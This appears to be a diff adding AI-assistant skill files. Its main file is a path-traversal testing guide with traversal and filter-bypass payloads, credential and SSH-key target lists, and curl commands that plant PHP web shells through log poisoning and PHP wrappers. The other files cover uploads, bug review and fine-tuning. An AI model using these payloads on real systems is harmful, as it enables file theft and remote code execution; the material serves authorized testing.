package/merged-commands/skill-creator.md +356 -0
package/merged-commands/skill-developer.md +426 -0
package/merged-commands/skill-rails-upgrade.md +408 -0
package/merged-commands/skill-seekers.md +22 -0
package/merged-commands/skill-share.md +80 -0
package/merged-commands/slack-bot-builder.md +264 -0
package/merged-commands/slack-gif-creator.md +254 -0
package/merged-commands/slo-implementation.md +341 -0
package/merged-commands/smtp-penetration-testing.md +500 -0
package/merged-commands/social-content.md +807 -0
package/merged-commands/software-architecture.md +75 -0
package/merged-commands/solidity-security.md +34 -0
package/merged-commands/spark-engineer.md +100 -0
package/merged-commands/spark-optimization.md +427 -0
package/merged-commands/spec-miner.md +88 -0
package/merged-commands/spring-boot-engineer.md +104 -0
package/merged-commands/sql-injection-testing.md +448 -0
package/merged-commands/sql-optimization-patterns.md +35 -0
package/merged-commands/sql-pro.md +173 -0
package/merged-commands/sqlmap-database-pentesting.md +400 -0
package/merged-commands/sre-engineer.md +98 -0
package/merged-commands/ssh-penetration-testing.md +488 -0
package/merged-commands/startup-analyst.md +328 -0
package/merged-commands/startup-business-analyst-business-case.md +487 -0
package/merged-commands/startup-business-analyst-financial-projections.md +353 -0
package/merged-commands/startup-business-analyst-market-opportunity.md +240 -0
package/merged-commands/startup-financial-modeling.md +467 -0
package/merged-commands/startup-metrics-framework.md +34 -0
package/merged-commands/stitch-ui-design.md +378 -0
package/merged-commands/stride-analysis-patterns.md +33 -0
package/merged-commands/stripe-integration.md +454 -0
package/merged-commands/subagent-driven-development.md +240 -0
package/merged-commands/superpowers-lab.md +22 -0
package/merged-commands/swift-expert.md +94 -0
package/merged-commands/swiftui-expert-skill.md +275 -0
package/merged-commands/systematic-debugging.md +296 -0
package/merged-commands/systems-programming-rust-project.md +440 -0
package/merged-commands/tailwind-design-system.md +33 -0
package/merged-commands/tailwind-patterns.md +269 -0
package/merged-commands/tavily-web.md +36 -0
package/merged-commands/tdd-orchestrator.md +205 -0
package/merged-commands/tdd-workflow.md +149 -0
package/merged-commands/tdd-workflows-tdd-cycle.md +221 -0
package/merged-commands/tdd-workflows-tdd-green.md +73 -0
package/merged-commands/tdd-workflows-tdd-red.md +164 -0
package/merged-commands/tdd-workflows-tdd-refactor.md +187 -0
package/merged-commands/team-collaboration-issue.md +37 -0
package/merged-commands/team-collaboration-standup-notes.md +44 -0
package/merged-commands/team-composition-analysis.md +413 -0
package/merged-commands/telegram-bot-builder.md +254 -0
package/merged-commands/telegram-mini-app.md +279 -0
package/merged-commands/template-skill.md +6 -0
package/merged-commands/temporal-python-pro.md +370 -0
package/merged-commands/temporal-python-testing.md +170 -0
package/merged-commands/terraform-engineer.md +97 -0
package/merged-commands/terraform-module-library.md +261 -0
package/merged-commands/terraform-skill.md +517 -0
package/merged-commands/terraform-specialist.md +166 -0
package/merged-commands/test-automator.md +224 -0
package/merged-commands/test-driven-development.md +371 -0
package/merged-commands/test-fixing.md +119 -0
package/merged-commands/test-master.md +104 -0
package/merged-commands/testing-patterns.md +259 -0
package/merged-commands/theme-factory.md +59 -0
package/merged-commands/threat-mitigation-mapping.md +33 -0
package/merged-commands/threat-modeling-expert.md +60 -0
package/merged-commands/threejs-skills.md +22 -0
package/merged-commands/threejs.md +89 -0
package/merged-commands/tool-design.md +318 -0
package/merged-commands/top-web-vulnerabilities.md +543 -0
package/merged-commands/track-management.md +38 -0
package/merged-commands/trigger-dev.md +67 -0
package/merged-commands/turborepo-caching.md +419 -0
package/merged-commands/tutorial-engineer.md +139 -0
package/merged-commands/twilio-communications.md +295 -0
package/merged-commands/typescript-advanced-types.md +35 -0
package/merged-commands/typescript-expert.md +429 -0
package/merged-commands/typescript-pro.md +55 -0
package/merged-commands/ui-design-system.md +32 -0
package/merged-commands/ui-skills.md +22 -0
package/merged-commands/ui-styling.md +321 -0
package/merged-commands/ui-ux-designer.md +209 -0
package/merged-commands/ui-ux-pro-max.md +351 -0
package/merged-commands/ui-visual-validator.md +214 -0
package/merged-commands/unit-testing-test-generate.md +319 -0
package/merged-commands/unity-developer.md +230 -0
package/merged-commands/unity-ecs-patterns.md +33 -0
package/merged-commands/unreal-engine-cpp-pro.md +114 -0
package/merged-commands/upgrading-expo.md +118 -0
package/merged-commands/upstash-qstash.md +68 -0
package/merged-commands/using-git-worktrees.md +217 -0
package/merged-commands/using-neon.md +84 -0
package/merged-commands/using-superpowers.md +87 -0
package/merged-commands/uv-package-manager.md +37 -0
package/merged-commands/ux-researcher-designer.md +30 -0
package/merged-commands/varlock-claude-skill.md +22 -0
package/merged-commands/vector-database-engineer.md +60 -0
package/merged-commands/vector-index-tuning.md +42 -0
package/merged-commands/vercel-deploy-claimable.md +120 -0
package/merged-commands/vercel-deploy.md +22 -0
package/merged-commands/vercel-deployment.md +79 -0
package/merged-commands/verification-before-completion.md +139 -0
package/merged-commands/vexor.md +22 -0
package/merged-commands/video-downloader.md +106 -0
package/merged-commands/viral-generator-builder.md +199 -0
package/merged-commands/voice-agents.md +68 -0
package/merged-commands/voice-ai-development.md +302 -0
package/merged-commands/voice-ai-engine-development.md +721 -0
package/merged-commands/vue-expert-js.md +91 -0
package/merged-commands/vue-expert.md +374 -0
package/merged-commands/vulnerability-scanner.md +276 -0
package/merged-commands/wcag-audit-patterns.md +41 -0
package/merged-commands/web-artifacts-builder.md +74 -0
package/merged-commands/web-design-guidelines.md +36 -0
package/merged-commands/web-frameworks.md +324 -0
package/merged-commands/web-performance-optimization.md +646 -0
package/merged-commands/web3-testing.md +427 -0
package/merged-commands/webapp-testing.md +96 -0
package/merged-commands/websocket-engineer.md +96 -0
package/merged-commands/windows-privilege-escalation.md +496 -0
package/merged-commands/wireshark-analysis.md +497 -0
package/merged-commands/wordpress-penetration-testing.md +485 -0
package/merged-commands/wordpress-pro.md +105 -0
package/merged-commands/workflow-automation.md +68 -0
package/merged-commands/workflow-orchestration-patterns.md +333 -0
package/merged-commands/workflow-patterns.md +38 -0
package/merged-commands/writing-plans.md +116 -0
package/merged-commands/writing-skills.md +125 -0
package/merged-commands/x-article-publisher-skill.md +22 -0
package/merged-commands/xlsx-official.md +289 -0
package/merged-commands/xlsx.md +289 -0
package/merged-commands/xss-html-injection.md +499 -0
package/merged-commands/youtube-transcript.md +415 -0
package/merged-commands/zapier-make-patterns.md +67 -0
package/merged-commands/zustand-store.md +68 -0
package/package.json +1 -1
package/scripts/merge-commands.js +21 -0
package/templates/base/rules/auto-skill.md +131 -0

package/merged-commands/file-path-traversal.md ADDED Viewed

@@ -0,0 +1,486 @@
+---
+name: File Path Traversal Testing
+description: This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+# File Path Traversal Testing
+## Purpose
+Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
+## Prerequisites
+### Required Tools
+- Web browser with developer tools
+- Burp Suite or OWASP ZAP
+- cURL for testing payloads
+- Wordlists for automation
+- ffuf or wfuzz for fuzzing
+### Required Knowledge
+- HTTP request/response structure
+- Linux and Windows filesystem layout
+- Web application architecture
+- Basic understanding of file APIs
+## Outputs and Deliverables
+1. **Vulnerability Report** - Identified traversal points and severity
+2. **Exploitation Proof** - Extracted file contents
+3. **Impact Assessment** - Accessible files and data exposure
+4. **Remediation Guidance** - Secure coding recommendations
+## Core Workflow
+### Phase 1: Understanding Path Traversal
+Path traversal occurs when applications use user input to construct file paths:
+```php
+// Vulnerable PHP code example
+$template = "blue.php";
+if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
+    $template = $_COOKIE['template'];
+}
+include("/home/user/templates/" . $template);
+```
+Attack principle:
+- `../` sequence moves up one directory
+- Chain multiple sequences to reach root
+- Access files outside intended directory
+Impact:
+- **Confidentiality** - Read sensitive files
+- **Integrity** - Write/modify files (in some cases)
+- **Availability** - Delete files (in some cases)
+- **Code Execution** - If combined with file upload or log poisoning
+### Phase 2: Identifying Traversal Points
+Map application for potential file operations:
+```bash
+# Parameters that often handle files
+?file=
+?path=
+?page=
+?template=
+?filename=
+?doc=
+?document=
+?folder=
+?dir=
+?include=
+?src=
+?source=
+?content=
+?view=
+?download=
+?load=
+?read=
+?retrieve=
+```
+Common vulnerable functionality:
+- Image loading: `/image?filename=23.jpg`
+- Template selection: `?template=blue.php`
+- File downloads: `/download?file=report.pdf`
+- Document viewers: `/view?doc=manual.pdf`
+- Include mechanisms: `?page=about`
+### Phase 3: Basic Exploitation Techniques
+#### Simple Path Traversal
+```bash
+# Basic Linux traversal
+../../../etc/passwd
+../../../../etc/passwd
+../../../../../etc/passwd
+../../../../../../etc/passwd
+# Windows traversal
+..\..\..\windows\win.ini
+..\..\..\..\windows\system32\drivers\etc\hosts
+# URL encoded
+..%2F..%2F..%2Fetc%2Fpasswd
+..%252F..%252F..%252Fetc%252Fpasswd  # Double encoding
+# Test payloads with curl
+curl "http://target.com/image?filename=../../../etc/passwd"
+curl "http://target.com/download?file=....//....//....//etc/passwd"
+```
+#### Absolute Path Injection
+```bash
+# Direct absolute path (Linux)
+/etc/passwd
+/etc/shadow
+/etc/hosts
+/proc/self/environ
+# Direct absolute path (Windows)
+C:\windows\win.ini
+C:\windows\system32\drivers\etc\hosts
+C:\boot.ini
+```
+### Phase 4: Bypass Techniques
+#### Bypass Stripped Traversal Sequences
+```bash
+# When ../ is stripped once
+....//....//....//etc/passwd
+....\/....\/....\/etc/passwd
+# Nested traversal
+..././..././..././etc/passwd
+....//....//etc/passwd
+# Mixed encoding
+..%2f..%2f..%2fetc/passwd
+%2e%2e/%2e%2e/%2e%2e/etc/passwd
+%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
+```
+#### Bypass Extension Validation
+```bash
+# Null byte injection (older PHP versions)
+../../../etc/passwd%00.jpg
+../../../etc/passwd%00.png
+# Path truncation
+../../../etc/passwd...............................
+# Double extension
+../../../etc/passwd.jpg.php
+```
+#### Bypass Base Directory Validation
+```bash
+# When path must start with expected directory
+/var/www/images/../../../etc/passwd
+# Expected path followed by traversal
+images/../../../etc/passwd
+```
+#### Bypass Blacklist Filters
+```bash
+# Unicode/UTF-8 encoding
+..%c0%af..%c0%af..%c0%afetc/passwd
+..%c1%9c..%c1%9c..%c1%9cetc/passwd
+# Overlong UTF-8 encoding
+%c0%2e%c0%2e%c0%af
+# URL encoding variations
+%2e%2e/
+%2e%2e%5c
+..%5c
+..%255c
+# Case variations (Windows)
+....\\....\\etc\\passwd
+```
+### Phase 5: Linux Target Files
+High-value files to target:
+```bash
+# System files
+/etc/passwd           # User accounts
+/etc/shadow           # Password hashes (root only)
+/etc/group            # Group information
+/etc/hosts            # Host mappings
+/etc/hostname         # System hostname
+/etc/issue            # System banner
+# SSH files
+/root/.ssh/id_rsa           # Root private key
+/root/.ssh/authorized_keys  # Authorized keys
+/home/<user>/.ssh/id_rsa    # User private keys
+/etc/ssh/sshd_config        # SSH configuration
+# Web server files
+/etc/apache2/apache2.conf
+/etc/nginx/nginx.conf
+/etc/apache2/sites-enabled/000-default.conf
+/var/log/apache2/access.log
+/var/log/apache2/error.log
+/var/log/nginx/access.log
+# Application files
+/var/www/html/config.php
+/var/www/html/wp-config.php
+/var/www/html/.htaccess
+/var/www/html/web.config
+# Process information
+/proc/self/environ      # Environment variables
+/proc/self/cmdline      # Process command line
+/proc/self/fd/0         # File descriptors
+/proc/version           # Kernel version
+# Common application configs
+/etc/mysql/my.cnf
+/etc/postgresql/*/postgresql.conf
+/opt/lampp/etc/httpd.conf
+```
+### Phase 6: Windows Target Files
+Windows-specific targets:
+```bash
+# System files
+C:\windows\win.ini
+C:\windows\system.ini
+C:\boot.ini
+C:\windows\system32\drivers\etc\hosts
+C:\windows\system32\config\SAM
+C:\windows\repair\SAM
+# IIS files
+C:\inetpub\wwwroot\web.config
+C:\inetpub\logs\LogFiles\W3SVC1\
+# Configuration files
+C:\xampp\apache\conf\httpd.conf
+C:\xampp\mysql\data\mysql\user.MYD
+C:\xampp\passwords.txt
+C:\xampp\phpmyadmin\config.inc.php
+# User files
+C:\Users\<user>\.ssh\id_rsa
+C:\Users\<user>\Desktop\
+C:\Documents and Settings\<user>\
+```
+### Phase 7: Automated Testing
+#### Using Burp Suite
+```
+1. Capture request with file parameter
+2. Send to Intruder
+3. Mark file parameter value as payload position
+4. Load path traversal wordlist
+5. Start attack
+6. Filter responses by size/content for success
+```
+#### Using ffuf
+```bash
+# Basic traversal fuzzing
+ffuf -u "http://target.com/image?filename=FUZZ" \
+     -w /usr/share/wordlists/traversal.txt \
+     -mc 200
+# Fuzzing with encoding
+ffuf -u "http://target.com/page?file=FUZZ" \
+     -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
+     -mc 200,500 -ac
+```
+#### Using wfuzz
+```bash
+# Traverse to /etc/passwd
+wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
+      --hc 404 \
+      "http://target.com/index.php?file=FUZZ"
+# With headers/cookies
+wfuzz -c -z file,traversal.txt \
+      -H "Cookie: session=abc123" \
+      "http://target.com/load?path=FUZZ"
+```
+### Phase 8: LFI to RCE Escalation
+#### Log Poisoning
+```bash
+# Inject PHP code into logs
+curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
+# Include Apache log file
+curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
+# Include auth.log (SSH)
+# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
+curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
+```
+#### Proc/self/environ
+```bash
+# Inject via User-Agent
+curl -A "<?php system('id'); ?>" \
+     "http://target.com/page?file=/proc/self/environ"
+# With command parameter
+curl -A "<?php system(\$_GET['c']); ?>" \
+     "http://target.com/page?file=/proc/self/environ&c=whoami"
+```
+#### PHP Wrapper Exploitation
+```bash
+# php://filter - Read source code as base64
+curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
+# php://input - Execute POST data as PHP
+curl -X POST -d "<?php system('id'); ?>" \
+     "http://target.com/page?file=php://input"
+# data:// - Execute inline PHP
+curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
+# expect:// - Execute system commands
+curl "http://target.com/page?file=expect://id"
+```
+### Phase 9: Testing Methodology
+Structured testing approach:
+```bash
+# Step 1: Identify potential parameters
+# Look for file-related functionality
+# Step 2: Test basic traversal
+../../../etc/passwd
+# Step 3: Test encoding variations
+..%2F..%2F..%2Fetc%2Fpasswd
+%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
+# Step 4: Test bypass techniques
+....//....//....//etc/passwd
+..;/..;/..;/etc/passwd
+# Step 5: Test absolute paths
+/etc/passwd
+# Step 6: Test with null bytes (legacy)
+../../../etc/passwd%00.jpg
+# Step 7: Attempt wrapper exploitation
+php://filter/convert.base64-encode/resource=index.php
+# Step 8: Attempt log poisoning for RCE
+```
+### Phase 10: Prevention Measures
+Secure coding practices:
+```php
+// PHP: Use basename() to strip paths
+$filename = basename($_GET['file']);
+$path = "/var/www/files/" . $filename;
+// PHP: Validate against whitelist
+$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
+if (in_array($_GET['file'], $allowed)) {
+    include("/var/www/files/" . $_GET['file']);
+}
+// PHP: Canonicalize and verify base path
+$base = "/var/www/files/";
+$realBase = realpath($base);
+$userPath = $base . $_GET['file'];
+$realUserPath = realpath($userPath);
+if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
+    include($realUserPath);
+}
+```
+```python
+# Python: Use os.path.realpath() and validate
+import os
+def safe_file_access(base_dir, filename):
+    # Resolve to absolute path
+    base = os.path.realpath(base_dir)
+    file_path = os.path.realpath(os.path.join(base, filename))
+    # Verify file is within base directory
+    if file_path.startswith(base):
+        return open(file_path, 'r').read()
+    else:
+        raise Exception("Access denied")
+```
+## Quick Reference
+### Common Payloads
+| Payload | Target |
+|---------|--------|
+| `../../../etc/passwd` | Linux password file |
+| `..\..\..\..\windows\win.ini` | Windows INI file |
+| `....//....//....//etc/passwd` | Bypass simple filter |
+| `/etc/passwd` | Absolute path |
+| `php://filter/convert.base64-encode/resource=config.php` | Source code |
+### Target Files
+| OS | File | Purpose |
+|----|------|---------|
+| Linux | `/etc/passwd` | User accounts |
+| Linux | `/etc/shadow` | Password hashes |
+| Linux | `/proc/self/environ` | Environment vars |
+| Windows | `C:\windows\win.ini` | System config |
+| Windows | `C:\boot.ini` | Boot config |
+| Web | `wp-config.php` | WordPress DB creds |
+### Encoding Variants
+| Type | Example |
+|------|---------|
+| URL Encoding | `%2e%2e%2f` = `../` |
+| Double Encoding | `%252e%252e%252f` = `../` |
+| Unicode | `%c0%af` = `/` |
+| Null Byte | `%00` |
+## Constraints and Limitations
+### Permission Restrictions
+- Cannot read files application user cannot access
+- Shadow file requires root privileges
+- Many files have restrictive permissions
+### Application Restrictions
+- Extension validation may limit file types
+- Base path validation may restrict scope
+- WAF may block common payloads
+### Testing Considerations
+- Respect authorized scope
+- Avoid accessing genuinely sensitive data
+- Document all successful access
+## Troubleshooting
+| Problem | Solutions |
+|---------|-----------|
+| No response difference | Try encoding, blind traversal, different files |
+| Payload blocked | Use encoding variants, nested sequences, case variations |
+| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |

package/merged-commands/file-uploads.md ADDED Viewed

@@ -0,0 +1,22 @@
+---
+name: file-uploads
+description: "Expert at handling file uploads and cloud storage. Covers S3, Cloudflare R2, presigned URLs, multipart uploads, and image optimization. Knows how to handle large files without blocking. Use when: file upload, S3, R2, presigned URL, multipart."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+# File Uploads & Storage
+**Role**: File Upload Specialist
+Careful about security and performance. Never trusts file
+extensions. Knows that large uploads need special handling.
+Prefers presigned URLs over server proxying.
+## ⚠️ Sharp Edges
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Trusting client-provided file type | critical | # CHECK MAGIC BYTES |
+| No upload size restrictions | high | # SET SIZE LIMITS |
+| User-controlled filename allows path traversal | critical | # SANITIZE FILENAMES |
+| Presigned URL shared or cached incorrectly | medium | # CONTROL PRESIGNED URL DISTRIBUTION |

package/merged-commands/find-bugs.md ADDED Viewed

@@ -0,0 +1,86 @@
+---
+name: find-bugs
+description: "Find bugs, security vulnerabilities, and code quality issues in local branch changes. Use when asked to review changes, find bugs, security review, or audit code on the current branch."
+source: "https://github.com/getsentry/skills/tree/main/plugins/sentry-skills/skills/find-bugs"
+risk: safe
+---
+# Find Bugs
+Review changes on this branch for bugs, security vulnerabilities, and code quality issues.
+## When to Use This Skill
+Use this skill when:
+- Asked to review changes
+- Finding bugs in code
+- Performing security reviews
+- Auditing code on the current branch
+- Reviewing pull request changes
+## Phase 1: Complete Input Gathering
+1. Get the FULL diff: `git diff $(gh repo view --json defaultBranchRef --jq '.defaultBranchRef.name')...HEAD`
+2. If output is truncated, read each changed file individually until you have seen every changed line
+3. List all files modified in this branch before proceeding
+## Phase 2: Attack Surface Mapping
+For each changed file, identify and list:
+* All user inputs (request params, headers, body, URL components)
+* All database queries
+* All authentication/authorization checks
+* All session/state operations
+* All external calls
+* All cryptographic operations
+## Phase 3: Security Checklist (check EVERY item for EVERY file)
+* [ ] **Injection**: SQL, command, template, header injection
+* [ ] **XSS**: All outputs in templates properly escaped?
+* [ ] **Authentication**: Auth checks on all protected operations?
+* [ ] **Authorization/IDOR**: Access control verified, not just auth?
+* [ ] **CSRF**: State-changing operations protected?
+* [ ] **Race conditions**: TOCTOU in any read-then-write patterns?
+* [ ] **Session**: Fixation, expiration, secure flags?
+* [ ] **Cryptography**: Secure random, proper algorithms, no secrets in logs?
+* [ ] **Information disclosure**: Error messages, logs, timing attacks?
+* [ ] **DoS**: Unbounded operations, missing rate limits, resource exhaustion?
+* [ ] **Business logic**: Edge cases, state machine violations, numeric overflow?
+## Phase 4: Verification
+For each potential issue:
+* Check if it's already handled elsewhere in the changed code
+* Search for existing tests covering the scenario
+* Read surrounding context to verify the issue is real
+## Phase 5: Pre-Conclusion Audit
+Before finalizing, you MUST:
+1. List every file you reviewed and confirm you read it completely
+2. List every checklist item and note whether you found issues or confirmed it's clean
+3. List any areas you could NOT fully verify and why
+4. Only then provide your final findings
+## Output Format
+**Prioritize**: security vulnerabilities > bugs > code quality
+**Skip**: stylistic/formatting issues
+For each issue:
+* **File:Line** - Brief description
+* **Severity**: Critical/High/Medium/Low
+* **Problem**: What's wrong
+* **Evidence**: Why this is real (not already fixed, no existing test, etc.)
+* **Fix**: Concrete suggestion
+* **References**: OWASP, RFCs, or other standards if applicable
+If you find nothing significant, say so - don't invent issues.
+Do not make changes - just report findings. I'll decide what to address.

package/merged-commands/fine-tuning-expert.md ADDED Viewed

@@ -0,0 +1,98 @@
+---
+name: fine-tuning-expert
+description: Use when fine-tuning LLMs, training custom models, or optimizing model performance for specific tasks. Invoke for parameter-efficient methods, dataset preparation, or model adaptation.
+triggers:
+  - fine-tuning
+  - fine tuning
+  - LoRA
+  - QLoRA
+  - PEFT
+  - adapter tuning
+  - transfer learning
+  - model training
+  - custom model
+  - LLM training
+  - instruction tuning
+  - RLHF
+  - model optimization
+  - quantization
+role: expert
+scope: implementation
+output-format: code
+---
+# Fine-Tuning Expert
+Senior ML engineer specializing in LLM fine-tuning, parameter-efficient methods, and production model optimization.
+## Role Definition
+You are a senior ML engineer with deep experience in model training and fine-tuning. You specialize in parameter-efficient fine-tuning (PEFT) methods like LoRA/QLoRA, instruction tuning, and optimizing models for production deployment. You understand training dynamics, dataset quality, and evaluation methodologies.
+## When to Use This Skill
+- Fine-tuning foundation models for specific tasks
+- Implementing LoRA, QLoRA, or other PEFT methods
+- Preparing and validating training datasets
+- Optimizing hyperparameters for training
+- Evaluating fine-tuned models
+- Merging adapters and quantizing models
+- Deploying fine-tuned models to production
+## Core Workflow
+1. **Dataset preparation** - Collect, format, validate training data quality
+2. **Method selection** - Choose PEFT technique based on resources and task
+3. **Training** - Configure hyperparameters, monitor loss, prevent overfitting
+4. **Evaluation** - Benchmark against baselines, test edge cases
+5. **Deployment** - Merge/quantize model, optimize inference, serve
+## Reference Guide
+Load detailed guidance based on context:
+| Topic | Reference | Load When |
+|-------|-----------|-----------|
+| LoRA/PEFT | `references/lora-peft.md` | Parameter-efficient fine-tuning, adapters |
+| Dataset Prep | `references/dataset-preparation.md` | Training data formatting, quality checks |
+| Hyperparameters | `references/hyperparameter-tuning.md` | Learning rates, batch sizes, schedulers |
+| Evaluation | `references/evaluation-metrics.md` | Benchmarking, metrics, model comparison |
+| Deployment | `references/deployment-optimization.md` | Model merging, quantization, serving |
+## Constraints
+### MUST DO
+- Validate dataset quality before training
+- Use parameter-efficient methods for large models (>7B)
+- Monitor training/validation loss curves
+- Test on held-out evaluation set
+- Document hyperparameters and training config
+- Version datasets and model checkpoints
+- Measure inference latency and throughput
+### MUST NOT DO
+- Train on test data
+- Skip data quality validation
+- Use learning rate without warmup
+- Overfit on small datasets
+- Merge incompatible adapters
+- Deploy without evaluation
+- Ignore GPU memory constraints
+## Output Templates
+When implementing fine-tuning, provide:
+1. Dataset preparation script with validation
+2. Training configuration file
+3. Evaluation script with metrics
+4. Brief explanation of design choices
+## Knowledge Reference
+Hugging Face Transformers, PEFT library, bitsandbytes, LoRA/QLoRA, Axolotl, DeepSpeed, FSDP, instruction tuning, RLHF, DPO, dataset formatting (Alpaca, ShareGPT), evaluation (perplexity, BLEU, ROUGE), quantization (GPTQ, AWQ, GGUF), vLLM, TGI
+## Related Skills
+- **MLOps Engineer** - Model versioning, experiment tracking
+- **DevOps Engineer** - GPU infrastructure, deployment
+- **Data Scientist** - Dataset analysis, statistical validation